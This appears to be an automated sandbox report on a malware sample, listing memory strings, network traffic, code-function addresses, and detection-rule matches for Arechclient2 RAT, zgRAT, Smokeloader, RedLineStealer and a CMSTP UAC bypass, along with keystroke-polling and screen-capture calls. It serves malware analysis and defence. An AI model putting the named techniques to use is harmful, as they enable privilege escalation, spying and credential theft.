                              Source: MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                              Source: MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/eula/
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: https://www.iolo.com/company/legal/eula/?
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/privacy/
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: https://www.iolo.com/company/legal/privacy/?
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/sales-policy/
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: https://www.iolo.com/company/legal/sales-policy/?
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/about/
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/about/NxIDhpMpHGkydnaCixJBjyQJs.exe
                              Source: u5qk.0.exe, 00000001.00000003.2284077697.000000002A91C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                              Source: u5qk.0.exe, 00000001.00000003.2284077697.000000002A91C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                              Source: u5qk.0.exe, 00000001.00000003.2284077697.000000002A91C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                              Source: u5qk.0.exe, 00000001.00000003.2284077697.000000002A91C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                              Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                              Source: u5qk.0.exe, 00000001.00000003.2284077697.000000002A91C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                              Source: unknownHTTPS traffic detected: 185.93.1.247:443 -> 192.168.2.4:49747 version: TLS 1.2
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00BAC8B0 GetClientRect,GetDC,CreateCompatibleBitmap,GetDC,CreateCompatibleDC,BitBlt,3_2_00BAC8B0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_6C8FA5AA GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,3_2_6C8FA5AA

                              System Summary

                              barindex
                              Source: 14.2.run.exe.39d686d.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 18.2.MSBuild.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                              Source: 6.2.cmd.exe.54c00c8.8.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                              Source: 3.2.run.exe.3e7ad5b.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 14.2.run.exe.3a1ad5b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 15.2.cmd.exe.52100c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                              Source: 15.2.cmd.exe.4c3b976.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 6.2.cmd.exe.4a80e64.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 3.2.run.exe.3e7a15b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 6.2.cmd.exe.54c00c8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                              Source: 15.2.cmd.exe.52100c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                              Source: 14.2.run.exe.3a1a15b.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 15.2.cmd.exe.4c7f264.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 6.2.cmd.exe.4a3c976.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 15.2.cmd.exe.4c7fe64.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 3.2.run.exe.3e3686d.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 6.2.cmd.exe.4a80264.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                              Source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e900c6ca8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                              Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee882432f.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                              Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54c537d.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                              Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee8848739.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                              Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54e4dad.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                              Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54d47a3.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                              Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee87fd525.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                              Source: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                              Source: 00000001.00000002.2492933650.0000000004054000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                              Source: 00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                              Source: 00000000.00000002.2368576914.00000000041E5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                              Source: C:\Users\user\AppData\Local\Temp\nkho, type: DROPPEDMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                              Source: C:\Users\user\AppData\Local\Temp\ssfwvk, type: DROPPEDMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA5F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,1_2_6BA5F280
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BABB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,1_2_6BABB910
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BABB8C0 rand_s,NtQueryVirtualMemory,1_2_6BABB8C0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BABB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,1_2_6BABB700
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA7ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,1_2_6BA7ED10
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BC862C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,1_2_6BC862C0
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_004278800_2_00427880
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0040B8AE0_2_0040B8AE
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0040C1910_2_0040C191
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_004123A00_2_004123A0
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0040F4410_2_0040F441
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0040C44C0_2_0040C44C
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0042140C0_2_0042140C
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0040BC200_2_0040BC20
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0041BE390_2_0041BE39
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0040BECA0_2_0040BECA
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_004087610_2_00408761
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0041B7220_2_0041B722
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0040C7FC0_2_0040C7FC
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_041526070_2_04152607
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0414BE870_2_0414BE87
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0414C6B30_2_0414C6B3
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0414F6A80_2_0414F6A8
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0414C1310_2_0414C131
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0415B9890_2_0415B989
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_041489C80_2_041489C8
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0414CA630_2_0414CA63
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0414BB150_2_0414BB15
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0414C3F80_2_0414C3F8
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA535A01_2_6BA535A0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA5F3801_2_6BA5F380
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAC53C81_2_6BAC53C8
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA9D3201_2_6BA9D320
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA6C3701_2_6BA6C370
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA553401_2_6BA55340
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA522A01_2_6BA522A0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA84AA01_2_6BA84AA0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA6CAB01_2_6BA6CAB0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAC2AB01_2_6BAC2AB0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BACBA901_2_6BACBA90
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA71AF01_2_6BA71AF0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA9E2F01_2_6BA9E2F0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA98AC01_2_6BA98AC0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA99A601_2_6BA99A60
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA5C9A01_2_6BA5C9A0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA8D9B01_2_6BA8D9B0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA951901_2_6BA95190
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAB29901_2_6BAB2990
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA6D9601_2_6BA6D960
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAAB9701_2_6BAAB970
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BACB1701_2_6BACB170
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA7A9401_2_6BA7A940
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA860A01_2_6BA860A0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA7C0E01_2_6BA7C0E0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA958E01_2_6BA958E0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAC50C71_2_6BAC50C7
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA9B8201_2_6BA9B820
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAA48201_2_6BAA4820
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA678101_2_6BA67810
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA9F0701_2_6BA9F070
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA788501_2_6BA78850
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA7D8501_2_6BA7D850
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAA77A01_2_6BAA77A0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA5DFE01_2_6BA5DFE0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA86FF01_2_6BA86FF0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA69F001_2_6BA69F00
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA977101_2_6BA97710
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAB4EA01_2_6BAB4EA0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BABE6801_2_6BABE680
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA75E901_2_6BA75E90
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAC76E31_2_6BAC76E3
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA5BEF01_2_6BA5BEF0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA6FEF01_2_6BA6FEF0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAB9E301_2_6BAB9E30
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAA56001_2_6BAA5600
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA97E101_2_6BA97E10
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAC6E631_2_6BAC6E63
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA5C6701_2_6BA5C670
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAA2E4E1_2_6BAA2E4E
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA746401_2_6BA74640
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA79E501_2_6BA79E50
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA93E501_2_6BA93E50
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAB85F01_2_6BAB85F0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA90DD01_2_6BA90DD0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA6FD001_2_6BA6FD00
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA7ED101_2_6BA7ED10
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA805121_2_6BA80512
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAB34A01_2_6BAB34A0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BABC4A01_2_6BABC4A0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA66C801_2_6BA66C80
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA5D4E01_2_6BA5D4E0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA96CF01_2_6BA96CF0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA664C01_2_6BA664C0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA7D4D01_2_6BA7D4D0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAC542B1_2_6BAC542B
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BACAC001_2_6BACAC00
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA95C101_2_6BA95C10
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAA2C101_2_6BAA2C10
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA654401_2_6BA65440
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAC545C1_2_6BAC545C
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BBA0BA01_2_6BBA0BA0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BC06BE01_2_6BC06BE0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB7EA801_2_6BB7EA80
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BBB8A301_2_6BBB8A30
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BBAEA001_2_6BBAEA00
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB7CA701_2_6BB7CA70
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BBC09B01_2_6BBC09B0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB909A01_2_6BB909A0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BBBA9A01_2_6BBBA9A0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BC1C9E01_2_6BC1C9E0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB349F01_2_6BB349F0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB569001_2_6BB56900
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB389601_2_6BB38960
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BC068E01_2_6BC068E0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BBEC8C01_2_6BBEC8C0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB508201_2_6BB50820
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB8A8201_2_6BB8A820
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BBD48401_2_6BBD4840
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB0EFB01_2_6BB0EFB0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BBDEFF01_2_6BBDEFF0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB00FE01_2_6BB00FE0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BC48FB01_2_6BC48FB0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB06F101_2_6BB06F10
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BBC2F701_2_6BBC2F70
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BC40F201_2_6BC40F20
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB6EF401_2_6BB6EF40
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB86E901_2_6BB86E90
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB0AEC01_2_6BB0AEC0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BBA0EC01_2_6BBA0EC0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BBE0E201_2_6BBE0E20
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB9EE701_2_6BB9EE70
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB04DB01_2_6BB04DB0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BC8CDC01_2_6BC8CDC0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB96D901_2_6BB96D90
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BC2AD501_2_6BC2AD50
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BBCED701_2_6BBCED70
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BC88D201_2_6BC88D20
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB5ECD01_2_6BB5ECD0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAFECC01_2_6BAFECC0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BBDAC301_2_6BBDAC30
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BBC6C001_2_6BBC6C00
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB0AC601_2_6BB0AC60
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB5E3B01_2_6BB5E3B0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB323A01_2_6BB323A0
